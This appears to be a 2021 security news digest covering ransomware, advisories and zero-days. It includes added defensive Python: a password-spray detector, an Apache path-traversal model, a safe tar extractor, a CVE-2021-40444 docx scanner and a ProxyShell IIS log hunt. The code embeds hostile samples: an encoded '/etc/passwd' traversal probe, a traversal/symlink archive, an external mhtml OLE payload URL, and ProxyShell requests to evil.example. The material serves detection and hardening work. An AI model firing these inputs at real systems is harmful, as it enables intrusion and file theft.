    Microsoft recently released news regarding the Nobelium threat actors, the same group responsible for the supply chain attack leveraging SolarWinds Orion products. Microsoft says the actors may replicate a similar approach by targeting organizations integral to the global IT supply chain. This time, however, the targets appear to be "resellers and other technology service providers that customize, deploy, and manage cloud services and other technologies on behalf of their customers" (Microsoft, 2021). Rather than exploiting flaws and vulnerabilities, they use standard techniques such as password spraying and phishing as initial access vectors.
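    Password spraying, the technique named in both the Microsoft warning above and this Nobelium item, is easy to miss with per-account lockout alerting because each account sees only one or two failures. The detector below is an added example written for this digest, not Microsoft's or any vendor's tooling; it works on a constructed, simplified authentication log format (timestamp, user, source, result) and flags a source that fails against many distinct accounts in a short window while trying each account only a couple of times, then lists the accounts that source later signed into successfully.

```python
"""Detect password-spraying patterns in authentication logs (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, not real data: 203.0.113.7 tries one guess against
# many accounts and succeeds on 'frank'; 198.51.100.4 is a user mistyping
# their own password twice before signing in.
SAMPLE_LOG = """\
2021-10-28T08:00:01Z user=alice src=203.0.113.7 result=FAIL
2021-10-28T08:00:03Z user=bob src=203.0.113.7 result=FAIL
2021-10-28T08:00:05Z user=carol src=203.0.113.7 result=FAIL
2021-10-28T08:00:07Z user=dave src=203.0.113.7 result=FAIL
2021-10-28T08:00:09Z user=erin src=203.0.113.7 result=FAIL
2021-10-28T08:00:11Z user=frank src=203.0.113.7 result=SUCCESS
2021-10-28T08:05:00Z user=alice src=198.51.100.4 result=FAIL
2021-10-28T08:05:20Z user=alice src=198.51.100.4 result=FAIL
2021-10-28T08:05:40Z user=alice src=198.51.100.4 result=SUCCESS
"""


def parse_auth_line(line):
    """Parse the hypothetical 'ts user=.. src=.. result=..' format."""
    ts_str, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    ts = datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")
    return ts, kv["user"], kv["src"], kv["result"]


def detect_password_spray(log_text, window=timedelta(minutes=30),
                          min_users=5, max_per_user=2):
    """Return {src: sorted targeted users} for sources that failed against at
    least `min_users` distinct accounts inside `window` while hitting each
    account at most `max_per_user` times (the low-and-slow-per-account shape
    that stays under lockout thresholds)."""
    events = sorted(parse_auth_line(l) for l in log_text.splitlines() if l.strip())
    failures = defaultdict(list)
    for ts, user, src, result in events:
        if result == "FAIL":
            failures[src].append((ts, user))

    findings = {}
    for src, fails in failures.items():
        start = 0
        for end in range(len(fails)):          # sliding window over this source's failures
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, user in fails[start:end + 1]:
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                findings[src] = sorted(per_user)
                break
    return findings


def successful_logins_after_spray(log_text, findings):
    """(src, user) pairs where a spraying source got a SUCCESS: reset these first."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, user, src, result = parse_auth_line(line)
        if src in findings and result == "SUCCESS":
            hits.append((src, user))
    return hits


if __name__ == "__main__":
    found = detect_password_spray(SAMPLE_LOG)
    print("spraying sources:", found)
    print("compromised accounts:", successful_logins_after_spray(SAMPLE_LOG, found))
```

    The thresholds are deliberately parameters: tune `min_users` and `window` to your tenant size, and feed the function your IdP or VPN sign-in export after adapting `parse_auth_line`. Single-factor remote access is what makes a successful spray useful, so the account list this returns is also the MFA-enrollment list.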

    US Bureau of Industry and Security Bans Export of Hacking Tools to Authoritarian Regimes

    The Commerce Department’s Bureau of Industry and Security (BIS) has announced a new export control rule aimed at banning the export or resale of hacking tools to authoritarian regimes. The rule tightens export controls on technology that could be used by adversaries to conduct malicious cyber activities and surveillance of private citizens resulting in human rights abuses.

    When Ransomware Hits Rural America

    Westmoreland, Kansas is the seat of Pottawatomie County and home to around 750 of its 25,000 residents. The town was a stop on the Oregon Trail and is littered with references to that network of covered wagons that carried hundreds of thousands of people across the American west in the mid-1800s. But in recent weeks it was the site of another modern migration—this one of data, stolen from Pottawatomie County’s computers by cybercriminals who paralyzed its systems with ransomware and left some services inaccessible to residents for weeks.

    Ex-carrier Employee Sentenced for Role in Sim-swapping Scheme

    At least 19 customers were targeted and prosecutors estimate that the employee received $2,325 in bribes. Following his arrest, Defiore pleaded guilty to one count of conspiracy to commit wire fraud. US Attorney Duane Evans said that Defiore was sentenced on October 19 and will serve three months probation, a year of home confinement, and must perform 100 hours of community service. The SIM-swapper must also pay a $100 fee and $77,417.50 in restitution.

    Sinclair TV Stations Crippled by Weekend Ransomware Attack

    Sinclair Broadcast Group is a Fortune 500 media company (with annual revenues of $5.9 billion in 2020) and a leading local sports and news provider that owns multiple national networks. Its operations include 185 television stations affiliated with Fox, ABC, CBS, NBC, and The CW (including 21 regional sports network brands), with approximately 620 channels in 87 markets across the US (reaching almost 40% of all US households). This is the second incident to hit Sinclair's TV stations this year; in July 2021 the company asked all Sinclair stations to change passwords "as quickly as possible" following a security breach.

    Analysis of a persistent AgentTesla campaign targeting the UAE

    Cyjax analysts have analysed a long-running AgentTesla infostealer campaign targeting Dubai and the United Arab Emirates. The campaign began in at least January 2021 and the samples we gathered continued, almost daily, until May 2021. We have also seen new samples compiled in October 2021. Unlike most AgentTesla campaigns, the targeting focused heavily on the UAE, with only a handful of samples using the same C2 servers venturing outside the region into India and Italy.

    US Authorities Issue BlackMatter Ransomware Alert

    The US authorities have released more details on the emerging ransomware group BlackMatter, which they say has already targeted multiple critical infrastructure providers in the United States. The alert comes from the Cybersecurity and Infrastructure Security Agency (CISA), the FBI and the National Security Agency (NSA).

    The True Cost of DDoS Attacks

    Cyber-attacks against internet-connected resources have risen during the last 12 months, with distributed denial-of-service (DDoS) one of the most significant. DDoS has the power to shut down internet connectivity for an organization and act as a smokescreen for more malicious attacks such as ransomware. Yet the financial impact can be challenging to calculate.

    REvil Ransomware Operation Shuts Down Once Again

    According to reports this morning, the REvil ransomware group has had its operations shut down again after a threat actor hijacked their Tor leak site and payment portal. The information was shared on the XSS hacking forum by one of REvil’s representatives, “0_neday”.

    BlackByte: Free Decryptor Released for Ransomware Strain Summary

    Security researchers were able to crack the malware's encryption and produce a decryptor that victim organizations can use for file and system recovery: “Trustwave, a Chicago-based cybersecurity and managed security services provider owned by Singaporean telecommunications company Singtel Group Enterprise, on Friday announced the release of the free decryptor, available for download from GitHub.”

    This Malware Botnet Gang Has Stolen Millions with a Surprisingly Simple Trick

    A prominent botnet known as MyKings has made $24.7 million using its network of compromised computers to mine and steal cryptocurrency.

    MyKings, also known as Smominru and Hexmen, is the world's largest botnet dedicated to mining cryptocurrencies by free-riding off its victims' desktop and server CPUs. It's a lucrative business that gained attention in 2017 after infecting more than half a million Windows computers to mine about $2.3 million of Monero in a month.

    Over 90% of Firms Suffered Supply Chain Breaches Last Year

    Some 93% of global organizations have suffered a direct breach due to weaknesses in their supply chains over the past year, according to BlueVoyant.

    BlueVoyant surveyed 1200 IT and procurement managers responsible for supply chain and cyber risk management. Their research found that the average number of breaches experienced in the past 12 months grew from “2.7 in 2020 to 3.7 in 2021, a 37% increase.”

    Three More Ransomware Attacks hit Water and Wastewater Systems in 2021

    A joint cybersecurity advisory published today by the FBI, NSA, CISA, and the EPA revealed three more attacks launched by ransomware gangs against US water and wastewater treatment facilities (WWS) this year.

    The advisory marks the first time these attacks have been publicly disclosed. The three facilities hit by ransomware were located in Nevada, Maine, and California and were attacked in March, July, and August respectively. In each case the ransomware reached the facility's SCADA industrial control systems.

    Chinese Hackers Use Windows Zero-day to Attack Defense, IT Firms

    A Chinese-speaking threat actor tracked as IronHusky has been exploiting a zero-day vulnerability in the Windows Win32k driver to deploy a new remote access trojan (RAT). The RAT, called MysterySnail, was discovered by Kaspersky researchers in August and September 2021 after the exploit was seen on multiple Microsoft Windows servers. The researchers found an elevation-of-privilege exploit for CVE-2021-40449 being used to install MysterySnail. The vulnerability was patched in this month’s Patch Tuesday.

    Medium - Microsoft Mitigates Largest DDoS

    Microsoft announced that its Azure cloud service mitigated a 2.4 terabits per second (Tbps) DDoS attack at the end of August, the largest DDoS attack recorded to date. The attack was aimed at an Azure customer in Europe, but Microsoft did not disclose the name of the victim. It is the largest DDoS against an Azure customer since August 2020, when experts observed a 1 Tbps attack.

    High - CISA Names 3 ‘Exceptionally Dangerous’ Behaviors to Avoid

    CISA has published a short catalog of the "bad practices" that most often expose organizations to cyber attacks. The first three entries are the use of unsupported or end-of-life software, the use of known, fixed or default passwords and credentials, and the use of single-factor authentication for remote or administrative access. After reviewing them, we find they correlate directly with the large-scale breaches we typically see and share every week, and the devices and infrastructure affected by these misconfigurations range from cloud-based platforms to systems maintained on-prem.

    Patch Apache HTTP Servers Now to Avoid Zero Day Exploit

    CVE-2021-41773 is described as a path traversal flaw in version 2.4.49, which was itself only released a few weeks ago. “An attacker could use a path traversal attack to map URLs to files outside the expected document root,” a description of the bug noted. “If files outside of the document root are not protected by ‘require all denied’ these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts.”
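    The bug class behind CVE-2021-41773 is an order-of-operations mistake: the server decided whether a path contained a `..` segment before the percent-encoded form had been fully decoded, so `.%2e/` slipped past the check and became `../` afterwards. The model below is an added example, not Apache's code: `naive_map_url` reproduces that ordering, `safe_map_url` decodes until the string stops changing (the follow-up fix in 2.4.50 was itself bypassed with a double-encoded dot, tracked as CVE-2021-42013) and then requires the resolved path to stay under the document root, and `is_traversal_probe` turns the same check into a triage filter for request paths pulled from an access log. The document root and the request paths are made up for the demonstration.

```python
"""Model of the CVE-2021-41773 traversal and a decode-then-resolve fix (added example)."""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"   # hypothetical document root


def naive_map_url(url_path, docroot=DOCROOT):
    """The flawed ordering: reject '..' segments on the still-encoded path,
    percent-decode only afterwards. '.%2e' is not '..' at check time."""
    if any(seg == ".." for seg in url_path.split("/")):
        raise PermissionError("traversal rejected")
    decoded = unquote(url_path)                       # '.%2e' becomes '..' here
    return posixpath.normpath(docroot + "/" + decoded.lstrip("/"))


def fully_decode(s, max_rounds=5):
    """Percent-decode until stable, so '%252e' (double encoded) also ends as '.'."""
    for _ in range(max_rounds):
        nxt = unquote(s)
        if nxt == s:
            return s
        s = nxt
    raise PermissionError("path did not stabilise after repeated decoding")


def safe_map_url(url_path, docroot=DOCROOT):
    """Decode first, resolve against docroot, then require the result to stay
    under docroot: the containment the advisory's 'require all denied' hint
    is asking you to enforce."""
    decoded = fully_decode(url_path)
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    full = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    if full != docroot and not full.startswith(docroot + "/"):
        raise PermissionError("resolves outside document root")
    return full


def is_traversal_probe(url_path):
    """Cheap log triage: does this request path escape the root once decoded?"""
    try:
        safe_map_url(url_path)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    probe = "/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"
    print("naive:", naive_map_url(probe))          # escapes the document root
    print("probe flagged:", is_traversal_probe(probe))
```

    Run `is_traversal_probe` over the `cs-uri-stem` column of your access logs to find who tried this against you before the patch landed; any hit that returned HTTP 200 deserves a look at what was readable outside the root (and whether `mod_cgi` was enabled, since the same bug leaks CGI source).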

    Karakurt: potential new ransomware group emerges

    According to its site, Karakurt is a “hacking team” that compromises an organisation's data and then extorts them for its return. It is unclear if Karakurt utilises ransomware or if it only steals data. Based on Karakurt's claims, organisations will be notified of the compromise and will then have to choose whether to pay an unspecified fee or have their data leaked via the Karakurt site.

    Bandwidth[.]com Is Latest Victim of DDoS Attacks

    Bandwidth is a voice over Internet Protocol (VoIP) services company that provides voice telephony over the Internet to businesses and resellers. Recent reporting suggests that it has become the latest victim of the distributed denial of service attacks targeting VoIP providers this month; as a result there have been widespread voice outages for its customers.

    A complete PoC exploit for CVE-2021-22005 in VMware vCenter is available online

    We reported last week that VMware had released updates to address critical vulnerabilities in their vSphere and Cloud Foundation software where a remote attacker could take control of an affected device over port 443. These types of platforms often store mission-critical data in the form of virtual machines, which could include domain controllers, proprietary applications, as well as data centers.

    SonicWall Critical Vulnerability Should Be Patched ASAP

    SonicWall has issued a security notice for a critical vulnerability in its SMA 100 series devices. The flaw is tracked as CVE-2021-20034. If successfully exploited, it could allow an unauthenticated remote attacker to delete arbitrary files from the affected products (SMA 200, 210, 400, 410 and 500v) and potentially gain administrative rights. The company is urging users to patch as soon as possible.

    100M IoT Devices Exposed By Zero-Day Bug

    Researchers at Guardara discovered a vulnerability in NanoMQ that could expose roughly 100 million devices across 10,000 enterprises to attack. NanoMQ, an open-source platform from EMQ that monitors IoT devices in real time, acts as a “message broker” that delivers alerts when unusual activity is detected. EMQ’s products are used to monitor the health of patients leaving a hospital, to detect fires, and to monitor car systems, smartwatches, smart-city applications, and more.

    Cisco Addresses 3 Critical Vulnerabilities in IOS XE Software

    It has been a pretty busy week for vendors of networking equipment. Netgear this week disclosed several vulnerabilities in their product line of home and office routers. Now, Cisco is advising everyone that they have addressed three critical vulnerabilities impacting their IOS XE operating system used to power multiple products, including routers and wireless controllers.

    Conti Ransomware Targeting Organizations Worldwide

    CISA, FBI, and the NSA released a joint advisory today warning companies of Conti ransomware targeting organizations worldwide. The alert suggests that the operators are attempting to steal sensitive information from US and international organizations.

    VMware Releases Security Updates

    VMware has released security updates to address multiple vulnerabilities in vCenter Server and Cloud Foundation. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to access restricted endpoints.

    CMA CGM Hit by Another Cyber Attack

    We reported a while ago that CMA CGM had suffered an attack that impacted several servers and websites. The company immediately disconnected systems from its networks and powered off equipment to prevent the Ragnar Locker Windows ransomware from spreading throughout its network: "The Marseille-headquartered firm is understood to have been hit by ransomware which paralysed much of its IT infrastructure."

    Ransomware Report: Commonly Exploited CVE’s Express the Importance of Patch Management

    A report published today clearly highlights the importance of patch management and of securing devices exposed directly to the internet: those used for digital communications or applications that store mission-critical data, including VPN appliances, networking devices, Exchange servers, Microsoft Office products, and hypervisors. Over the past year, several vulnerabilities have been disclosed for which proof-of-concept code was made available to the public. This means that anyone with a moderate skill set, up to and including nation-state actors, can use the code to carry out attacks and study it for further enhancement.

    Microsoft Asks Azure Linux Admins to Manually Patch OMIGOD Bugs

    Microsoft has issued additional guidance on securing Azure Linux machines impacted by the recently addressed critical OMIGOD vulnerabilities. The four security flaws (allowing remote code execution and privilege escalation) were found in the Open Management Infrastructure (OMI) software agent silently installed on more than half of Azure instances.

    EMEA and APAC governments targeted in widespread credential harvesting campaign

    Cyjax analysts have uncovered a large credential harvesting campaign targeting multiple government departments in APAC and EMEA countries. Over 50 hostnames were analysed, many of which were posing as the Ministry of Foreign Affairs, Ministry of Finance, or Ministry of Energy, in various countries such as Uzbekistan, Belarus, and Turkey; as well as the Main Intelligence Directorate of Ukraine and the Pakistan Navy.

    Attackers Impersonate DoT in Two-Day Phishing Scam

    Threat actors impersonated the U.S. Department of Transportation (USDOT) in a two-day phishing campaign that used a combination of tactics – including creating new domains that mimic federal sites so as to appear to be legitimate – to evade security detections.

    Zloader Attacks Able to Disable Windows Defender

    As you might know, Microsoft Defender Antivirus is the anti-malware solution that comes pre-installed on systems running Windows 10, and the latest Zloader campaign disables it so the malware can run undetected. The attackers have also changed the malware distribution mechanism from spam or phishing emails to TeamViewer Google adverts, which link users to fraudulent download sites through Google AdWords.

    Patches Released for Google Chrome Zero-Day Vulnerabilities

    As mentioned in previous reporting, Google has had its fair share of zero-day discoveries this year, a few of which have been actively exploited in the wild. Yesterday, the company announced fixes for 11 different bugs, including two zero-days: "Google is aware that exploits for CVE-2021-30632 and CVE-2021-30633 exist in the wild."

    North Korean Hacker Recently Employed Social Media to Launch a Cyberattack

    The new advanced persistent threat (APT) activity, attributed to the Kumsong 121 group, was disclosed on Tuesday in a press release by the security firm ESTsecurity. Instead of sending an email, the attackers befriended the victim on social media and then sent them an infected file. Having compromised one social media account, the attackers went on to find their next targets among the victim's social media acquaintances, building rapport through friendly messages on topics of shared interest, such as gossip, before delivering the malware.

    Apple Releases Emergency Update: Patch, but Don’t Panic

    This is a good report from Malwarebytes: “The NSO Group says that its spyware is used against criminals and terrorists, but journalists and human rights activists are known to have been targeted by Pegasus attacks, along with political dissidents and business executives at the highest levels. The software can be used to collect all manner of personal data from devices, intercept calls and messages, and much more. If your work is particularly sensitive, it isn’t something you want anywhere near your phone.”

    GitHub Tackles Severe Vulnerabilities in Node.js Packages

    On Wednesday, GitHub said it had received reports from Robert Chen and Philip Papurt, between July 21 and August 13, of security flaws impacting the npm packages tar and @npmcli/arborist via one of GitHub's bug bounty programs, which give researchers credit and financial rewards for responsibly disclosing vulnerabilities to the vendor.
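    The node-tar advisories GitHub fixed in this round were arbitrary file write and overwrite bugs in archive extraction: member names containing `..` or absolute paths, and symlinks inside the archive that point outside the extraction directory so that a later member is written through the link. The following is an added example, not npm's or GitHub's code, showing the same three checks in Python's `tarfile` against a constructed in-memory archive; the extraction directory `DEMO_DEST` is hypothetical and nothing is written until `extract_safely` is called.

```python
"""Guarding archive extraction against traversal and symlink escapes (added example)."""
import io
import os
import tarfile
import tempfile

# Hypothetical extraction target for the demo.
DEMO_DEST = os.path.join(tempfile.gettempdir(), "safe_extract_demo")


def build_sample_archive():
    """Constructed archive: one benign file plus the three hostile shapes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name, data):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        add_file("pkg/README", b"hello\n")
        add_file("../escape.txt", b"owned\n")               # '..' traversal
        link = tarfile.TarInfo("pkg/link")                    # symlink out of dest
        link.type = tarfile.SYMTYPE
        link.linkname = "../../outside"
        tar.addfile(link)
        add_file("pkg/link/payload", b"written outside\n")   # write *through* the link
    return buf.getvalue()


def _inside(root, candidate):
    root = os.path.realpath(root)
    cand = os.path.realpath(candidate)
    return cand == root or cand.startswith(root + os.sep)


def check_members(data, dest):
    """Classify members without writing anything.
    Returns (safe_names, rejected) where rejected is a list of (name, reason)."""
    safe, rejected = [], []
    symlinks = []   # every link seen so far, accepted or not
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        for m in tar.getmembers():
            target = os.path.join(dest, m.name)
            if os.path.isabs(m.name) or not _inside(dest, target):
                rejected.append((m.name, "path escapes destination"))
                continue
            # Never write through a link the archive itself declared, even one
            # that looked harmless: the archive controls where it points.
            if any(m.name.startswith(s + "/") for s in symlinks):
                rejected.append((m.name, "path passes through an archive symlink"))
                continue
            if m.issym() or m.islnk():
                symlinks.append(m.name)
                if m.issym():   # symlink targets are relative to the link's directory
                    link_target = os.path.join(os.path.dirname(target), m.linkname)
                else:           # hard link targets are relative to the archive root
                    link_target = os.path.join(dest, m.linkname)
                if os.path.isabs(m.linkname) or not _inside(dest, link_target):
                    rejected.append((m.name, "link target escapes destination"))
                    continue
            safe.append(m.name)
    return safe, rejected


def extract_safely(data, dest):
    """Extract only the members check_members() accepted."""
    safe, rejected = check_members(data, dest)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tar:
        members = [m for m in tar.getmembers() if m.name in safe]
        # Newer Pythons add their own 'data' filter; use it as a second layer.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(dest, members=members, **kwargs)
    return safe, rejected


def extracted_files(dest):
    """Relative paths of every file now under dest, for verification."""
    out = []
    for root, _, files in os.walk(dest):
        for f in files:
            out.append(os.path.relpath(os.path.join(root, f), dest))
    return sorted(out)


if __name__ == "__main__":
    print(extract_safely(build_sample_archive(), DEMO_DEST))
    print(extracted_files(DEMO_DEST))
```

    The third check is the one most extractors forget: a symlink that stays inside the destination is fine on its own, but a later member whose path runs through it is written wherever the link points, so the safe rule is to refuse to extract through any archive-declared link at all.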

    Cisco Released Security Patches for High-Severity Flaws in IOS XR Software

    IOS XR is a train of Cisco Systems' widely deployed Internetworking Operating System, used on their high-end Network Convergence System, carrier-grade routers such as the CRS series, 12000 series, and ASR9000 series. It provides a unique self-healing and self-defending operating system designed for always-on operation while scaling capacity and adding new services or features.

    Windows MSHTML Zero-day Defenses Bypassed as New Info Emerges

    Windows zero-day CVE-2021-40444 is being actively exploited in attacks. The vulnerability was disclosed on Tuesday with few details and is still awaiting an official patch. It is exploited through malicious ActiveX controls embedded in Office documents, affecting Microsoft Office 365 and Office 2019 among other products, and can be used to install malware on an impacted computer.
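    While the patch is pending, the document side of this attack is what you can triage today: the observed lure documents carried an `oleObject` relationship in `word/_rels/document.xml.rels` whose `Target` was an external `mhtml:` URL (with the `!x-usc:` form), which is what pulls the ActiveX control in from the attacker's server. The scanner below is an added example written for this digest, not Microsoft's guidance or any vendor's tool; it builds a minimal, constructed `.docx` in memory (the `example.invalid` URLs are placeholders) and flags any external OLE relationship, rating the `mhtml:`/`x-usc:` shape highest.

```python
"""Triage .docx files for the external-OLE pattern used in CVE-2021-40444 lures (added example)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def build_sample_docx(target, external=True):
    """Constructed minimal .docx containing only the parts the scanner reads."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="{ns}">'
        '<Relationship Id="rId5" Type="{type}" Target="{target}"{mode}/>'
        '</Relationships>'
    ).format(ns=RELS_NS, type=OLE_REL,
             target=escape(target, {'"': "&quot;"}), mode=mode)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


def scan_docx(data):
    """Return [(part, rel_id, target, severity)] for external oleObject relationships.

    Every .rels part under word/ is checked, so relationships hung off headers,
    footers or footnotes are covered as well as the main document part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for part in z.namelist():
            if not (part.startswith("word/") and part.endswith(".rels")):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") != OLE_REL or rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if re.match(r"(?i)mhtml:", target) or "!x-usc:" in target.lower():
                    severity = "high"    # the shape seen in the in-the-wild lures
                else:
                    severity = "medium"  # any external OLE reference is unusual
                findings.append((part, rel.get("Id"), target, severity))
    return findings


if __name__ == "__main__":
    lure = build_sample_docx(
        "mhtml:http://example.invalid/side.html!x-usc:http://example.invalid/side.html")
    for finding in scan_docx(lure):
        print(finding)
```

    Point `scan_docx` at attachments quarantined by your mail gateway; a "medium" hit is worth a look, a "high" hit is worth blocking the sender and the URL host. Note that the check only sees relationships, so a document that reaches the same control through a different container (RTF, for instance) needs its own rule.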

    Hackers Steal Data from United Nations

    Hackers have broken into the computer network of the United Nations and made off with data, according to researchers at cybersecurity firm Resecurity. Bloomberg reports that the unidentified cyber-criminals behind the theft appear to have gained access simply by using login credentials stolen from a UN employee. Entry was gained by logging in to the employee’s Umoja account. Umoja, which means “unity” in Kiswahili, is the enterprise resource planning system implemented by the UN in 2015.

    Malicious Actor Discloses FortiGate SSL-VPN Credentials

    Fortinet has become aware that a malicious actor has recently disclosed SSL-VPN access information for 87,000 FortiGate SSL-VPN devices. These credentials were obtained from systems that remained unpatched against FG-IR-18-384 / CVE-2018-13379. "While they may have since been patched, if the passwords were not reset, they remain vulnerable."

    Zoho Releases Security Update for ADSelfService Plus - Actors Exploiting Newly Identified CVE

    This joint advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI), United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) to highlight the cyber threat associated with active exploitation of a newly identified vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus—a self-service password management and single sign-on solution. CVE-2021-40539, rated critical, is an authentication bypass vulnerability affecting REST API URLs that could enable remote code execution. The FBI and CISA assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability.

    Attacks on IoT Devices Double Over Past Year

    According to Kaspersky, “attacks targeting IoT devices have almost doubled from the second half of 2020 to the first six months of this year” (Info Security Magazine, 2021). The company uses a network of honeypots to mimic vulnerable devices and collects data from potential attacks.

    Hacker Puts Stolen Data Online Because College Refuses to Pay

    The criminals behind the Ragnar Locker ransomware have issued a warning to victims via their own website not to go to the police or hire companies to negotiate the ransom, as all stolen data will be published immediately. According to the criminals, they increasingly have to deal with professional negotiators, which does not make the negotiation process easier or safer. The group states that such negotiators work for or are associated with the police and are not interested in the commercial interests of their customers or the security of their data.

    CISA - Ransomware Related Threat Report

    The Cybersecurity & Infrastructure Security Agency (CISA) is sharing the attached ransomware-related threat alerts from a trusted industry partner for network defense purposes. The first alert details a threat actor mounting attacks using the Nefilim and Hive payloads and the second alert details possible pre-ransomware activity.

    Risk Considerations for Managed Service Provider Customers

    Going into the holiday, we are unfortunately expecting the inevitable: large-scale cyber attacks against infrastructure and mission-critical assets. Given the current trend and the attacks observed during previous holidays, we are expecting attacks this weekend but have our fingers crossed that it is a quiet one for everyone.

    FBI Warns of Ransomware Gangs Targeting Food, Agriculture Orgs

    “The FBI says ransomware gangs are actively targeting and disrupting the operations of organizations in the food and agriculture sector, causing financial loss and directly affecting the food supply chain. These ransomware attacks can potentially impact a wide range of businesses across the sector, from small farms, markets, and restaurants to large-scale producers, processors, and manufacturers.”

    This New Malware Family Using CLFS Log Files to Avoid Detection

    CLFS is a general-purpose logging subsystem in Windows that's accessible to both kernel-mode as well as user-mode applications such as database systems, OLTP systems, messaging clients, and network event management systems for building and sharing high-performance transaction logs. "Because the file format is not widely used or documented, there are no available tools that can parse CLFS log files," Mandiant researchers explained in a write-up published this week. "This provides attackers with an opportunity to hide their data as log records in a convenient way, because these are accessible through API functions."

    Conti Ransomware Now Hacking Exchange Servers With Proxyshell Exploits

    The Conti ransomware gang is hacking into Microsoft Exchange servers and breaching corporate networks using recently disclosed ProxyShell vulnerability exploits. ProxyShell is the name of an exploit utilizing three chained Microsoft Exchange vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) that allow unauthenticated, remote code execution on unpatched vulnerable servers.
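    The first link in the ProxyShell chain is a path-confusion request: the Exchange front end accepts a request for `/autodiscover/autodiscover.json` whose query begins with `@<host>/<back-end path>`, and forwards it to back-end endpoints such as `/mapi/nspi` and `/powershell` that an unauthenticated caller should never reach. That shape is visible in the IIS logs of a patched or unpatched server alike, so it is a useful retroactive hunt. The code below is an added example, not Conti tooling, Microsoft's detection guidance or anyone's published rule; the IIS W3C log lines are constructed (default field order, `PLACEHOLDER` standing in for the token value) and the heuristic is a starting point to tune, not a signature.

```python
"""Hunt IIS logs for the ProxyShell path-confusion request shape (added example)."""
from collections import Counter

# Constructed IIS W3C lines in the default field order. The two POSTs carry
# the chain's shape; the GETs are ordinary Autodiscover and OWA traffic.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-08-20 10:15:30 10.0.0.5 GET /autodiscover/autodiscover.json Email=jdoe@corp.example&Protocol=ActiveSync 443 - 198.51.100.23 Outlook/16.0 - 200 0 0 41
2021-08-20 10:15:32 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 203.0.113.9 python-requests/2.26.0 - 200 0 0 312
2021-08-20 10:15:35 10.0.0.5 POST /autodiscover/autodiscover.json @evil.example/powershell/?X-Rps-CAT=PLACEHOLDER&Email=autodiscover/autodiscover.json%3F@evil.example 443 - 203.0.113.9 python-requests/2.26.0 - 200 0 0 540
2021-08-20 10:16:01 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.corp.example%2fowa%2f 443 - 198.51.100.23 Mozilla/5.0 - 200 0 0 12
"""

# Back-end paths the chain forwards to via the confused front-end request.
BACKEND_PATHS = ("/mapi/nspi", "/powershell")


def parse_iis_line(line):
    """Map a default-format W3C line to the fields the check needs; None for
    comment lines and anything that does not have the expected 15 columns."""
    if line.startswith("#") or not line.strip():
        return None
    f = line.split()
    if len(f) < 15:
        return None
    return {"time": f[0] + " " + f[1], "method": f[3], "stem": f[4],
            "query": f[5], "client": f[8], "status": f[11]}


def is_proxyshell_probe(stem, query):
    """True when an autodiscover.json request carries the '@host/<backend>'
    query prefix (or re-embeds the autodiscover path in Email=), which is the
    shape that makes the front end proxy the call to a back-end endpoint."""
    if stem.lower() != "/autodiscover/autodiscover.json":
        return False
    q = query.lower()
    return q.startswith("@") and (
        any(p in q for p in BACKEND_PATHS) or "autodiscover.json%3f@" in q)


def find_proxyshell_probes(log_text):
    hits = []
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec and is_proxyshell_probe(rec["stem"], rec["query"]):
            hits.append(rec)
    return hits


def sources(hits):
    """Client IPs ranked by number of matching requests."""
    return Counter(h["client"] for h in hits)


if __name__ == "__main__":
    found = find_proxyshell_probes(SAMPLE_IIS_LOG)
    for h in found:
        print(h["time"], h["client"], h["method"], h["stem"], h["query"][:60], h["status"])
    print(sources(found))
```

    A match with `sc-status` 200 against `/powershell` is the one to escalate: that is the point in the chain where the attacker has a back-end PowerShell session, and what follows in the Conti intrusions (web shell drop, mailbox export) should be visible in the same time window on the Exchange host.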

